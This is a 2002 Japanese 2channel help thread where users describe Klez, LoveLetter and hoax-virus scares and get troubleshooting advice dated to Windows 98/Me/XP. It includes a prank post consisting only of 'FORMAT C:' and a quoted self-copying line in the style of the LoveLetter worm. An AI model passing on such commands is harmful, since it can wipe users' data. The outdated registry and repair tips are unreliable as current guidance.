>>387 感染してるときは他のPCに感染るのでカキコしないでください!
390 :
名無しさん@お腹いっぱい。 :02/07/02 00:14
391 :
名無し@ヘルプ :02/07/02 00:24
すみません。ウィルス・メールをあけてしまい、それ以来 パソを立ち上げる時、「メモリ不足のため QKD1A2.EXEを 読み込めません〜」のエラー・メッセージが出てくるのです。 .EXEの前の番号はその時どきによって異なります。 でも、何も問題ないだろうと思い、2〜3週間ほったらかしにしてました。 昨日、友人や親から私のメールでウィルスが送られてくるという苦情 をもらい、さっきノートン・アンチ・ウィルスを試してみたのですが、 全く効きません。どなたか対処法を教えてください。 ちょっとパニくって文章がまとまりないですが、よろしくお願いします。
392 :
名無しさん@お腹いっぱい。 :02/07/02 00:26
393 :
名無しさん@お腹いっぱい。 :02/07/02 00:27
394 :
名無しさん@お腹いっぱい。 :02/07/02 00:28
>>391 そして必要時以外ネットを切断すること。
395 :
名無しさん@お腹いっぱい。 :02/07/02 00:35
>>391 ちなみに試したノートンはもともと常駐させてたものか?
違うだろう。オンラインチェックでなくて、新しくインストールしたなら、
ウィルスによって無効化された可能性もある。アンチドートで検出できたらその後
種類をサイトで調べておいた方がいいかも。
396 :
名無し@ヘルプ :02/07/02 00:43
>393 DLしました。今から試してみます。 >394 繋げていると・・・・ダメなんですか >395 >>ウィルスによって無効化された可能性もある。 多分、そうだと思います。わかりました。種類を調べます。
398 :
名無しさん@お腹いっぱい。 :02/07/02 00:55
>>396 つないでいる間に勝手にウィルスが送信されるからさ。
他人を巻き添えにしないこと。
ノートン博士が400getした模様です・・・・
401 :
名無し@ヘルプ :02/07/02 01:33
ウィルスは検索できました が、それら(すごい数だったのでびっくりです)を削除 できませんでした・・・・・
402 :
名無し@ヘルプ :02/07/02 01:37
操作パスワードってなによ(涙) 明日、仕事なのに今日も寝れないなんて
>>402 パスワードを入力すると操作できるようになるんだね、きっと。
404 :
名無しさん@お腹いっぱい。 :02/07/02 01:41
>>401 いかん、笑える。種類は?削除できなかったものの居場所は?処理方法は?
405 :
名無しさん@お腹いっぱい。 :02/07/02 01:42
オンラインスキャン?で検索したら「感染なし」だったのですが、 それでもまだ潜伏してることもありますか? 387です。
406 :
名無しさん@お腹いっぱい。 :02/07/02 01:44
>>405 圧縮ファイルだとかは検知できないこともあるよ。
407 :
名無し@ヘルプ :02/07/02 01:45
インストールしたのにプログラムの中にフォルダができてないんです なぜでしょうか 普通、その中にパスワードって入っているのではないかと・・・・
408 :
名無しさん@お腹いっぱい。 :02/07/02 01:47
409 :
名無し@ヘルプ :02/07/02 01:49
390さんが書かれたものです
410 :
名無しさん@お腹いっぱい。 :02/07/02 01:50
仕事で使うんじゃなきゃ電源切ってあしたソフト買ってくるかどうか したら?
411 :
名無しさん@お腹いっぱい。 :02/07/02 01:51
>>ヘルプ どこのファイルが削除できないのかな?
412 :
名無しさん@お腹いっぱい。 :02/07/02 01:52
ウィルスの種類がわかる?
413 :
名無し@ヘルプ :02/07/02 01:53
でもノートンが効かないんじゃ・・・
414 :
名無しさん@お腹いっぱい。 :02/07/02 01:55
>>413 おもなウィルスには専用の駆除ツールがあるけど、名前わからない?
415 :
名無し@ヘルプ :02/07/02 01:55
>411 Cドライブの中のものです >412 I-Worm.Klez.e となっております
416 :
名無しさん@お腹いっぱい。 :02/07/02 01:58
417 :
名無し@ヘルプ :02/07/02 01:58
MEです!
418 :
名無しさん@お腹いっぱい。 :02/07/02 02:00
>>417 読めばわかるかも、だが、復元機能を停止させてからツールを使う。
セーフモード起動はわかる?
419 :
名無し@ヘルプ :02/07/02 02:00
わかります
421 :
名無しさん@お腹いっぱい。 :02/07/02 02:02
422 :
名無しさん@お腹いっぱい。 :02/07/02 02:04
これで寝れるな。
423 :
名無しさん@お腹いっぱい。 :02/07/02 02:12
>>423 まだ試作段階です。
基本的なことは出来ると思います。
>>423 yuki.exe のプロパティ
正式ファイル名:GTA3_CHEAT.exe
427 :
名無しさん@お腹いっぱい。 :02/07/02 09:35
昨日からWindowsのフォルダが”詳細”だと一切見れなくて(”一覧”"アイコン”だと見れる) ウイルス感染?とか思ってますがそんなウイルスあります? 窓自体のトラブルかな?
>>427 ウイルス感染? → ウィルスチェックしろ
遅れましたが、みなさんどうもありがとうございました。
431 :
名無しさん@お腹いっぱい。 :02/07/02 13:56
hotmailに件名「VALUE」で140kの メールが届きました。 しかし、メールの内容は何もありませんでした。 これって何ですか?
それでは、問題無いということで・・・
435 :
感染したのか :02/07/02 17:01
添付ファイル付の不明なメールが届いてたので、 即ゴミ箱行きにしたんですが、 再起動させると、マイコンピュータやゴミ箱やIE、OUTLOOK等以外の ファイルが全て消えてしまいました。 で、マイコンピュータを開こうとすると 「現在のセキュリティ設定では、このページのActiveXコントロール は実行できません。そのため、このページは表示できない可能性があります」 というメッセージが出てファイルが一切表示されません。 窓の下の方に○個のオブジェクトとは表示されているんですが・・・ safeモードで起動するとファイルは見えるんですが フロッピーにコピーすることも出来ません。 既に全てのファイルは削除されてしまったんでしょうか・・・ スタートボタンを押しても反応ないし、 本当に困りました・・・どなたかアドバイスを・・・
436 :
名無しさん@お腹いっぱい。 :02/07/02 17:09
>>435 Outlook ExpressのプレビューはOFFにしていたか?Internet Explorerのバージョンは?
プレビューで感染した可能性がある。ウィルススキャン汁。
437 :
感染したのか :02/07/02 18:01
>>436 もはやマイコンピュータをクリックすること
ぐらいしかできないんですよ。
開いても何も表示されないですけど・・・
今までウィルスとは無縁だったんで、
全く対策してなかったのがマズかったです。
仕事に影響及ぼしまくりで欝。
441 :
名無しさん@お腹いっぱい。 :02/07/02 18:51
あの〜ノートンアンチウィルス使ってるんですがさっきオートプロテクトが反応して ファイル名が出てこのファイルはJS何とかに感染しています。 と出て「ファイルへのアクセスが拒否されました」 「このファイルは修復できません」というのが交互に1,2回出て消えてしまいました。 この後コンピューターのスキャンを行ったのですが反応なしでした 修復できなかったファイルはどこへ行ったのか安心していいのか? 誰か教えてください!!
>>435 レジ改変系は、Win98やMeならscanreg /restoreで一発復旧可能な予感。
>>441 検疫されたなら。
\Norton SystemWorks\Norton Antivirus\Quarantineの中に、拡張子変えて保管されているかと。
443 :
名無しさん@お腹いっぱい。 :02/07/02 19:19
>>442 ないんですそれが・・・。オートプロテクトの設定をウィルスを見つけたら
自動的に修復する、で修復できなかったのがどうなるかわからないんです。
ウィルス名は JS.Exception.Exploit でした。
>>443 411の人ですよね?
状況書いてもらわんと、答えようが無いんですが。
削除されてしまったんでは?
変なサイト見ていて、仕込まれていたジャバスク系ウイルスでいきなり警告って奴でしょうか?
「自動的に修復する」→「修復失敗」でしたか?その後何しました?隔離・削除?
IEのキャッシュを空にすると削除されてしまうだけだし。
ブロックされたなら心配無いような気がするんですが。
とりあえず電話番号とブラウザを起動した時に最初に表示されるページが改変されているかどうか、チェックするようにお勧めします。
>>444 はい。修復失敗の後そのノートンのウィンドウは閉じてしまいました
最初のページも変わっていませんし電話もだいじょぶです
でも2chの入り口のつぼが表示されません・・・。
>>435 は氏んだのか? みんなが答えてるのにバージョン等の質問にも答え
ず、グチったまま逝ってしまったか。
>>411 OS何っすか?
98SEやMeならscanreg /restoreで一瞬で解決しますけど。
というか、それ系のジャバスクウイルスって、ホームページ改変と電話番号改変以外の罠ってまず仕込まないんですよね。
ブロックできたなら、それでいいんじゃないでしょうか、とりあえず。
というか該当サイトはどゆとこなんでしょうか。捨て名なんだから、書いても恥にならないって思うんですが。
>>446 scanreg /restoreが無理なら、「マイコンピューターゾーン」を表示させてデータを退避って手もあったのになぁ。
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
0x00000021(33) → 0x00000001(1)
( )内の数字は10進法表示にて
>>411 そこ見たけど、nortonにヒットしないし、それ系のは見つからないんですが。
どっか前後に見た他のサイトなんじゃないでしょうか。
というか、OS何っすか。
>>450 そうなんですか・・・。今日は始めてそこにアクセスして画像見てたら
出てきたもので・・・。OSはXPです。
でももうスキャンしても出てこないんですよ・・・?なぜか。
変わったのはお気に入りに変なサイトが入っていました。もう消したんだけど。
今からちょっと出かけてきます質問しておいてすみません、ホントに。
>>411 ブロックされたなら、ええやん。
って書いときます。
>>451 >>441 を見る限りでは感染はしてなさそう。
ブラウザのキャッシュに反応して修復失敗後、自動で削除したんじゃないでしょうか。
みんなありがとう!!では行ってきます。 ここの人は親切な人ばかりだね!!
456 :
名無しさん@お腹いっぱい。 :02/07/02 23:50
今日仕事から帰ってきたら親父がPCの前で大騒ぎしていた。 なんでも、「jdbgmgr.exe」という熊のアイコンのウイルスに感染したから 削除したらPCがおかしくなった、と。 そりゃま、また突然やなあと、とりあえず、ノートンからの警告かと尋ねたら いや、友人からのメールでな、と。 はあ?と思ったんで、とりあえず開きっぱなしになってたメールを読んで みたら怪しいの何の。いたずらメールちがうの、とたずねたら、 いや、そんな事する奴じゃない、とか言って、またどないかしろしろとパニック になってるから、とりあえず「jdbgmgr.exe」がなにか Googleで調べたら 何か判るかもしれないと思ったら案の定・・ 思わず大笑いしてしまったよ。初めキョトンとしてた親父も恥ずかしそうに 苦笑いしていた。めったに拝めない姿だから、正直また爆笑してしまった。 引退したとはいえ元システム管理の人間でさえ引っかかってしまうとは 恐るべし、デマウイルス。 その親父の友人も相当焦っていたらしく、カーボンコピーで他人のメール アドレス晒しまくり。迷惑なことだ。 キシュツだったらごめん
で?
jdbgmgr.exeのデマメールは禿しく既出だが それにひっかかる元システム管理者は新しい
さあ?
461 :
名無しさん@お腹いっぱい。 :02/07/03 01:22
KLEZ.H付きのメールが送られてきました。 送られてきた時点ではそれだと気づかず、メールを見てしまいました。 でも添付ファイルは怪しかったので開きませんでした。 ちなみにメーラーはOutlook Express6です。 これって感染してるのでしょうか? KLEZ.Hは奇数月の6日に発症するらしいので今のところ感染したのかどうか分かりません。 対処法を教えてくださいませ。
463 :
感染したのか :02/07/03 09:53
レスして頂いた皆さん、有難うございます。 仕事が立て込んでまして、返事が遅くなっていましました。 申し訳ありません。 今朝がた、皆様のアドバイスをもとに 色々と試してみました。 で、レジを数日前のものに戻すと・・・ な、何と!復活しました!!!!タ、タスカッタ PCには無知なもので、 レジ関連の問題とすら気づきませんでした。 お騒がせしました・・・ 昨日、デルのサポートセンターに連絡しても そっけなく「OS再インストするしかない」と 言われたので、半ば諦めていたのですが、 初めてこの板を訪れた初心者の質問に快く答えて下さった cheshire-cat さんを初めとするみなさんの おかげで本当に助かりました。 これからはウィルス対策やPCについて、 もう少し勉強したいと思います。 本当に有難うございました!
464 :
名無しさん@お腹いっぱい。 :02/07/03 10:06
from:welcom<
[email protected] >
subject:A new game
<HTML><HEAD></HEAD><BODY>
<FONT>This is a very new game<br>
This game is my first work.<br>
You're the first player.<br>
I expect you would like it.</FONT></BODY></HTML>
PostPet>>>>>添付ファイル:no_filename がありました。
PostPet>>>>>C:\PROGRAM FILES\SO-NET\POSTPET FOR WINDOWS VER. 2.0\添付書類フォルダに展開しました
PostPet>>>>>添付ファイル:0no_filename がありました。
PostPet>>>>>C:\PROGRAM FILES\SO-NET\POSTPET FOR WINDOWS VER. 2.0\添付書類フォルダに展開しました
こんなメールがきました。どうすればいいですか?誰か助けてください。
回線切って首(略
>>464 そんなすぐに答が貰えるわけじゃなし、
初級ネット板にマルチポストにいったのはいただけない行為だな。
とにかく、
>>1 とか関連リンク見てみろよ。
アンチウイルスソフトでスキャンするのが最優先だろ?
467 :
名無しさん@お腹いっぱい。 :02/07/03 13:06
サイトを閲覧しただけで、そのサイトが感染していた場合、閲覧者のPCも感染してしまうという ワームが少し前にはやったと思うのですが、そういったワームとFWの関係について質問があります。 FW&対ウィルスのauto-protectを有効にしているのですが ワームのような強制メール配信のウィルスにかかってしまった場合、 FWはワームによってネットにアクセスしようとしていると、きっちり警告がでるのでしょうか? 一応環境を・・・ os w98 IE 6.0.2600.0000IC OE使用 FW ゾヌ2.6.362 セキュリティは高に、IEとかちゅだけ”接続許可”に設定 ノートン先生でauto-protect定義は毎週更新 よろしくお願いします
かもしれない
>468-469 。・゚・(ノД`)・゚・。
>466 おっしゃるとおりです マルチポストという言葉を知りませんでした。 ちょっとあせってました。 みなさん不快な思いをさせて 申し訳ございませんでした。 このようなまちがった行為は もういたしません。
>472、473 ありがとうございます。 じっくり読んでみます。
HDDに不良クラスタを発生させるウィルスはあるんでしょうか? HDDは5千時間ぐらい使用したもので、寿命かとも思うのですが、 異常になったときは丁度海外のサイトでmp3をダウンしてたもので、 タイミング的に少し気になります。 HDDの異常の状態はOS(W98)フリーズでHDDエンドレスアクセスでした。
>>467 >FWはワームによってネットにアクセスしようとしていると、きっちり警告がでるのでしょうか?
ウイルス定義ファイルの更新が間に合わなくて、キッチリ感染したって前提で。
自動メル送信は、メーラーを利用したものなら、メーラーを常にAllow(許可)にしていなければ、警告は出る、と思うが。
メーラー使わず自力で送信するなら、「妙なアプリが外に出ようとしてるぞ、おい!」、って警告が出る。
Personal Fire Wallを停止させるvilliなら、上記のどちらでも警告は出ない。
>>475 SirCamなんかは、「結果的にHDをクラッシュさせる」けど。
わざと不良セクタ作らせるようなvilliは、漏れは知らない。
Received:from imlmta03.aics.ne.jp(157.205.253.215)
by ** with SMTP; **
Received:from virmta04.aics.ne.jp ([157.205.253.132])
by imlmta03.aics.ne.jp (InterMail vM.5.01.03.13
201-253-122-118-113-20010918) with ESMTP id < 20020703004602_IOPO18809_imlmta03_aics_ne_jp_Virus_Deleted@virmta04.aics.ne.jp >
for<
[email protected] >; **
Received: from Zpkjjgmy ([61.124.120.25]) by virmta04.aics.ne.jp
(InterMail vM.5.01.03.13 201-253-122-118-113-20010918) with SMTP id < 20020703004519.SPIT20864.virmta04.aics.ne.jp_Virus_Deleted@virmta04.aics.ne.jp >
for<
[email protected] >; **
From:customer<
[email protected] >
To: 20020703004602_IOPO18809_imlmta03_aics_ne_jp_Virus_Deleted@aso.aics.ne.jp
20020703004519.SPIT20864.virmta04.aics.ne.jp_Virus_Deleted@aso.aics.ne.jp
[email protected] [email protected] Subject: A very powful tool
Message-Id:< 20020703004519_SPIT20864_virmta04_aics_ne_jp_Virus_Deleted@imlmta03.aics.ne.jp >
Date**
Hello,This is a special powful tool
I hope you would like it.
------------------ Virus Warning Message (on the network)
Found virus WORM_KLEZ.E in file BORDER.pif
The file is deleted.
---------------------------------------------------------
>>477 で?
From欄偽装するってのは、当然知ってるんだろうね?
前にどっかでメモリだかCPUだかに電気的に負荷かけてダメージ与えるウィルス
作れないかってスレあったなあ。そん時の結論は、作れる可能性は0ではないが
正常動作させれる機種の幅がものすごく狭くて現実的じゃないとかだったかなあ
>>478 無視汁。
>>456 最近になって、同じファイル名のウイルスも出てるから
話がややこしいですよ。
>>475 不良セクタは作れないけど、不良セクタとしてマークするのは簡単。
484 :
名無しさん@お腹いっぱい。 :02/07/04 04:46
ここでいいかわからないけど質問させて下さい。 PCを終了する時にウィルスを発見しましたって表示されて 慌ててバスターで検索したのですがみつかりませんでした。 最新にアップデートはしています。以前ウィルスにかかった 事があってワクチンを打った事があるのですが、それが関係 してるのでしょうか?それともバスターに引っかからない ウィルスに感染しちゃってるのでしょうか? 終了時に感染の表示が出たのは1回だけでその後は普通に 終了出来てます。ご指導お願いします。
486 :
名無しさん@お腹いっぱい。 :02/07/04 04:54
こんな時間にありがとうございます。 バスターじゃありません。終了時に感染してます!って 表示が出たんです。
487 :
名無しさん@お腹いっぱい。 :02/07/04 04:57
winのエラーとか出るのと同じような表示でした
ツール→メッセージルール→禁止された送信者にウィルスを送ってくる 人のメアドを登録したのにまだ送られてきます。他にないでしょうか?
>>486 名前は忘れたけど感染してる。
識者のレスを待つか、ひたすら検索せよ。
>>488 おそらくOEだと思うけど、送られてこなくなるわけじゃない。
送られてきたものが削除済みフォルダに入るだけ。
>>488 メーラーはOEかな?サーバで削除っていう選択肢がなかったっけ?
OEならあった。ツール→メッセージルール→メール で新規のメールルールってのが出る。 そこでいくつか条件を設定でき、「サーバから削除」を選べばいちいちDLしないで消せるはず。 条件設定をきちんとして他のメールは消さないよーに。
>>491 OE 4.5だとないみたいです。ショボーン
Received: from Rznhi (pl812.nas911.d-osaka.nttpc.ne.jp [210.139.91.44]) by mba.sphere.ne.jp (Postfix) with SMTP id 8148228CFE Received: from Ate (pl360.nas911.d-osaka.nttpc.ne.jp [210.139.109.104]) by mba.sphere.ne.jp (Postfix) with SMTP id 3D60928CE0
>484 漏れ、w2k使っててバスター入れてるけど、 2回くらいそういうのなったことある。 3ヶ月〜半年くらい前。 びっくりしてwindowsに戻って、バスターで検索かけても 何にも引っかからず<2回とも 結局今まで、原因はわからず。 パターンファイルはいつも最新にしてるし、 チェックも定期的にしてるんだがなあ。 参考にならずスマソ。
498 :
名無しさん@お腹いっぱい。 :02/07/04 12:23
父のパソコンがウイルスに感染しているので何とかしようと思い、 ウイルスバスターを入れようとしたのですが、 「容量がありません」と言われました。 空き容量は十分なので、ウイルスのせいだと思われるのですが、 仕方なくdos画面からスキャンしました。 すると、ウイルスを発見したのですが、 ウイルスバスターをインストールしてないので駆除ってできませんよね? どうしたらよいのか教えてくださいませ。 ちなみに、そのパソコンにはノートンが入っているのですが、 とても古いために使い物になりません。 ネットに接続してないのでアップデートもできません。 ネットに接続してアップデートしたほうがよいのでしょうか? それとも、そのノートンはもう使い物にならないので削除したほうがよいのでしょうか・・? 質問ばかりで恐縮です。
DOS画面からどうやってスキャンしたんだよ
>>498 ネットに接続できなければバスター入れても同じだろ。
どのアンチウィルスソフトも最初にアップデートする必要があるんだから。
あんちヴぃーるすも入れてない(使ってない)のに ウィルス食らったことを大前提にしてたり なんでもウィルスのせいにしたり デマメールでうろたえてる匂いがする Jdbgmgr.exeだったら笑うぞ。
>>499 何かダイアログが出て、(なんだったか忘れましたが)
「dos画面からならスキャンできます」みたいなこと言われたので、
よくわからないまま「はい」とかを押したら勝手にdos画面になって、
ひととおりスキャンして、いくつかウイルスが見つかって、
スキャンが終わったら自動的に再起動しました。
>>500 おっしゃるとおりです。
入ってるノートンがあまりに古いので、それよりはマシだという程度の理由で、
バスター2002を入れようとしたのですけどね・・。
ならまずウィルス名書かん事には何もわからんと思うが
>>503 ウイルス名メモる前に再起動してしまったのでわかりませんでした。
もう一度やってみます。ありがとうございます。
>>501 テディベアにびびって削除してしまったあなたとは違いますのでご安心を。
>498=504 テディベアにびびって削除してしまったあなたとは違いますのでご安心を。 あんた、人に聞いといて、その言い方はないんじゃないかい。
ぷ 498タンはあんな見え見えのデマにひっかかったのかな・・・?ハァハァ
501ではないが、
>>504 下段、なんか態度悪いなぁ。答えてもらえんぞ。
2chウィルス sage.exeも昔ちょびっとだけ流行ったね。
>>505 あまりに悪意あるレスにショックを受けたので。
それと、煽りに応じるのが礼儀かと思いまして。。
>509 あんな程度で”悪意あるレス”だと思うなら、 ここで聞くほうが間違ってる。
503へのレスと501へのレスのギャップがすごいな。
513 :
名無しさん@お腹いっぱい。 :02/07/04 13:21
長々と書いてあるわりに肝心の情報がないので、ああ書かれてしまうのだよ。 判断根拠がないので、前提から疑わなければいけなくなる。
>>510 そうですね。では消えますです。
おさわがせしましたm(_ _)m
アタシのために争うのはやめて!
518 :
484、486 :02/07/04 17:18
>>489 やっぱり感染してるんですか・・・
>>495 バスターでスキャンしても全然ヒットしないんです・・
>>497 全く同じ状況です。どうしていいものか困ってます。
皆さんレスありがとうございます。
497さんみたいにそのままにしておいていいものなんでしょうか?
オンラインスキャンでもヒットしないんです。
それでも感染してるんでしょうか?
質問ばかりですみません。
>>520 しません
どこぞのキチガイが、197のvbsのソースにセキュリティソフトが反応したのを
ウィルスに感染したーとかほざいてるだけだから。
つかみりゃわかるっしょ。んな情報に踊らされるのは
ノートンに踊らされて騒いでるキチガイと同レベルだぞ。
197ってそのスレ内の197な。
>>521 ありがとう。・゚・(ノД`)・゚・。
漏れはノートン(2001)は持ってるんだけど、使い方よく分からないヘタレなのです
スキャン(たぶん)してみたけど、何も反応しなかったので・・・
それも嫌だなー。・゚・(ノД`)・゚・。
524 :
名無しさん@お腹いっぱい。 :02/07/04 21:34
120Kくらいあるメールを 勢いで思わず開いたら、 なにも書かれてないメールでした。 後でウィルスソフトで調べてみますが、 最近こういったデマメールって流行ってるのかしら?
ノートン使ってないからわからんが 常時htmlまでウィルスのコード検索してんのか? 無意味だしそんなのオフでいいから反応しなくていいよ。 exeをDLした時は100階くらいスキャンかけて欲しいがな。。 (マンキンの時にexe警戒しないで踏んじまう初心者の多い事・・・)
>>526 一応、メルスキャンを無効にしても、喰らったら常時スキャンの方で検出できませう。
529 :
名無しさん@お腹いっぱい。 :02/07/04 21:40
VBS.Internalというのに感染しているみたいですけど、 どんなウィルスですかおせーてくらさい。 おながいします
UZEEEEEEEEEEEEEEEEEE またダウソ板からかよ ウィルスにかかってねーからもうくんな。
>>529 このスレのちょい上に書かれてる、2chにソース書き込まれたvilliの事っすか?
534 :
名無しさん@お腹いっぱい。 :02/07/04 21:48
>>530-533 あがとございました。
わたしがわるーございました。
ノートンが反応しただけでした。
ごめんなさい。
535 :
484、486 :02/07/04 21:58
>>519 アドバイスありがとうございました。
これでチェックしてみましたがやっぱりウィルスは検出されませんでした。
誤作動とかあるんですね。しばらく様子見てみます。
536 :
名無しさん@お腹いっぱい。 :02/07/05 01:34
質問です。VBS.Internalってどんなウイルスなんですか?
uzai
538 :
名無しさん@お腹いっぱい。 :02/07/05 02:52
大変な事になりました。エロサイトいってからパソコンおかしくなってしまいました。 具体的に言うと、モデムのランプがすごい速さで点滅してるんです(常に何かダウンロードしてる?) ウイルスなのかどうかもわかりません。助けてください、お願いします。
539 :
名無しさん@お腹いっぱい。 :02/07/05 04:40
>>538 パソコンに詳しい人の所へ持っていって何とかしてもらう。
おとなしく国際通話料金はらってね。 なんか検索すりゃーすむことわざわざきくやついっぱいいるねえ
541 :
名無しさん@お腹いっぱい。 :02/07/05 06:11
ごねれば払わなくて済むって聞いたよ。
>>541 国際電話料金は、通信料だから支払う義務があります。
払わなくていいのはQ2。
543 :
名無しさん@お腹いっぱい。 :02/07/05 11:15
7/4にシステム吹っ飛ばすウィルスってある? 最新情報調べてもなかったから
544 :
名無しさん@お腹いっぱい。 :02/07/05 11:25
545 :
名無しさん@お腹いっぱい。 :02/07/05 14:30
age
547 :
名無しさん@お腹いっぱい。 :02/07/05 18:43
548 :
名無しさん@お腹いっぱい。 :02/07/05 18:48
なんか、さっきから2chアクセスするたびにVBS.LoveLetter.Aの感染警告 メッセージをノートン先生が出すのだが・・・
どのウィルスかは問題じゃない、VBSだから同じこと
552 :
名無しさん@お腹いっぱい。 :02/07/05 19:02
>551 ふむふむ。(゜_゜) じゃ、『やりおるな、ノートン先生!』ということで・・・
553 :
名無しさん@お腹いっぱい。 :02/07/05 19:19
質問です。klezウイルスって何ですか? 私は携帯から2ちゃんにアクセスしてるんですけど、影響はありますか?
555 :
名無しさん@お腹いっぱい。 :02/07/05 19:48
最近はやりのLOVE-LETTER-FOR-YOUって書いてあるスレ開いても、ノートン先生が何も反応しません。 何か問題でもあるんでしょうか?
無い
>>557 すぐ前に書いてあっても読めないのはあなたの頭が感染しているのでは?
>>558 loveletterについては
>>555 で書いてあるのは読んでいますけれど、
loveletterにかかったときの対策法については何も書いてませんよね?
だから改めて書いたのですが。
>>559 この板のあちこちでガイシュツ、もううんざりだ。ニュー速へ帰れ。
>>560 他のスレを探したのですがloveletterについてのスレは見つかりません。
既出ならそのスレを貼っていただけますか?
そちらを見ますので。
>>561 ニュー速住人はウィルスごとにスレッドが立ってると思いこんでいる。
( ゚Д゚)ハァ?
今日はどのスレッドを見てもデジャヴ感覚が味わえる。
隊長!涙目の557が逃げていきます!
>>565 有り難いお申し出ですが、この度は遠慮しておきます。
570 :
名無しさん@お腹いっぱい。 :02/07/05 21:36
571 :
名無しさん@お腹いっぱい。 :02/07/05 21:41
572 :
名無しさん@お腹いっぱい。 :02/07/05 23:42
当方ノートンインターネットセキュリティ2002を使っていますが、 初めてウイルスが検出しました。VBS.LoveLetter.Aです。それでそれを 修復しようとしたら出来ませんでした。それで今は検疫しています。 これからどうしたらいいのでしょうか?よろしくお願いします。 ちなみに最新ウイルス定義にしていても修復できませんでした。 当方パソコン初心者(女)です。わかりやすく説明お願いします。
(女)は余計だな(w
(女・独身・美女・性格良) で写真付きなら 教えて君でも親切に教えるけどな。
本人の写真であると、どうやって判別すんだ?
>>573 見ました。という事は、ノートンの誤反応なのですね?
ウイルス感染ではないと?って事は、マイコンピュータのインターネット
オプションのInternet Temporary Filesの削除でいいんですね?
なんとなく判りましたのでその通りやってみました。
これで、もう一度一応ウイルススキャンしてみます。
みなさんの事を信用していない訳ではないんです。
本当にありがとうございました。
また結果報告します。
んじゃセキュ板よりってメモ紙もって写真とってもらうとか・・ いずれにせよ夢を持つのは大事だ。ハァハァ
579 :
名無しさん@お腹いっぱい。 :02/07/06 00:12
なんか今日知らないヤシから 「Internet Explorer 6」って件名のメールが届いてたんだが、これはウイルス?? 144kぐらいだったんだけど
少し上の方のレスが読めない方が多いこと多いこと
質問したら答えてくれる。敢えて面倒なことをする必要はない。 ってことだろ。
584 :
ウィルス疑似体験 :02/07/06 16:32
FORMAT C:
過去ログみました、理由が分かりました。
最近、変わったメールが来るようになりますた。
以下、その内容。
ご無沙汰しております。
以前、何度かメールをやり取りしたユキです。
使えそうなサイトを見つけたのでメールしました。
http://www.ryoko.us/ お役にたつと嬉しいです。
では、また。
当然、メールのやり取りしたことも聞いたコトもない相手です。
貼り付けてあるアドレスってナンなんでしょう?
ブラクラ?それともやっぱりウィルスでしょうか?
>>588 ただのSPAMでしょう。
といっても「Access Denied」と出て何もなかったですが。
あの、以前にIEでアニメーションGIFを アニメーションさせるように設定させたままだと セキュリティーホールをつかれてしまうという問題が あったとおもうんですが、あれはWIndows98 は問題ないんでしょうか?
スキャンの種類: リアルタイム保護 スキャン イベント: ウィルスが見つかりました ウィルス名: VBS.LoveLetter.A スキャンの種類: リアルタイム保護 スキャン イベント: ウィルスが見つかりました ウィルス名: VBS.LoveLetter.E 2ちゃんのどっかがおかしーぞ
>>591 ノートンがvbsウィルスのソースに誤反応してますた
スマソ
594 :
名無しさん@お腹いっぱい。 :02/07/07 16:08
http://oofun.com/annoying.shtml 友達にこのサイトのリンクをクリックしてみろといわれてやったら、
ブラクラでは無いでしょうが、ウィルスらしいものを貰ったようです。
本当にパソコンに自身のある方のみ、誰かこのサイトが何か解明してください。
お願いします。不安です。
VBS.Internalというファイルがノートンで検知されたのですが、隔離さえ出来ません。
595 :
名無しさん@お腹いっぱい。 :02/07/07 16:08
なぜalertごとに"script"で挾むのか問い詰めたいサイトですね
alertがこんなにあるなんて!すごいですね
598 :
ウイルスコレクター :02/07/07 16:52
俺はHDにそのまま保存されていた Happy99をHDを整理していて気が付いた。 間違えて実行してしまうととてつもなくやばーい事になるので とりあえず圧縮をかける事にした。 えーとZIP圧縮、ZIP圧縮と・・・ 俺はそう思いながら圧縮アプリにドラッグしようとマウスを近づけた。 しかし・・・!そのとき手が滑って 「ああっ!」 そう、間違えて他のエグザにドロップ&ドラッグしてしまったのだ エグザにエグザを重ねるとどうなるか知っているだろうか・・・? タイムマシンで恐竜時代に行ったのは良いものの、 岩盤と出現場所が重なり、分子が重なり、 熱核爆発を起こしてマシンもろとも蒸発する。正にそんな感じ HDが少し音をたてたかと思うと次の瞬間Windowが出現した (や、やっちまった・・・) 時はすでに遅し どんどん打ちあがるディスプレイの上の打ち上げ花火・・・ ∩ | | ∧_∧ | | / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ( ´Д`)// < 先生!僕を助けてください(汗 / / │ / /| / \_____________ __| | .| | \  ̄ ̄ ̄ ̄ ̄ ̄ ̄\ ||\ \ ||\|| ̄ ̄ ̄ ̄ ̄ ̄ ̄|| ̄ || || ̄ ̄ ̄ ̄ ̄ ̄ ̄|| .|| || 俺はウイルス集めだしてから初めて敗北した・・・ (まあ、後で直ぐに直ったけどね。W2Kだし 皆さんもウイルスには十分気をつけましょう。
洩れも実はklez.Hを実行してしまったことは内緒な。
携帯(ていうかエッジ)に最近大量の英語メールがくるのですが 今日確認したら今まで受信したメールボックスの中身が全部消えていました。 今日びは携帯にもウイルスがあるのですか? ちなみに添付書類が化けたような文字列ばかりのメールです。 最初の一文がAAAAAAAA…って続いてるような感じでした。
ウイルス集めてはpgpで暗号化してた奴もいたな
あの、以前にIEでアニメーションGIFを アニメーションさせるように設定させたままだと セキュリティーホールをつかれてしまうという問題が あったとおもうんですが、あれはWIndows98 は問題ないんでしょうか?
c.Copy(dirsystem&"\うんこ.TXT.vbs")
604 :
教えてください :02/07/07 18:35
「VBS.LoveLetter」に感染すると、 Microsoft Outlookのアドレス帳にある電子メールアドレスや、mIRCを介してインターネット上のチャットルームに自分自身を送信します。 とのことですが、それは一回きりですか? パソコン内にウィルスが存在している限り何度でも行われるのでしょうか?
